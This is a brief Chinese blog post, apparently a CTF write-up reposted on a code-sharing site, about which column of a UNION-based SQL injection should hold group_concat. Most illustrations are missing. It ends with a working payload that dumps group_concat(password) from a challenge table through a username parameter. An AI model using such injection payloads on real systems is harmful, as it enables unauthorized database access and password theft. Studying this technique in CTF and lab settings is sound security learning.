sql注入中联合查询group_concat位置

时间:2020-11-25 12:47:10   收藏:0   阅读:12

sql注入中联合查询group_concat位置

前言

思路

普通姿势

直到技术图片
技术图片

可以看到报错,但我们的语句并没有任何错误

换到第三个位置就可以正常显示

技术图片
技术图片

本地实验也是会报错

技术图片
技术图片

最终payload都是在最后一个位置上

?username=amin%27union select 11,33,group_concat(password)from l0ve1ysq1--+%2B&password=222

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!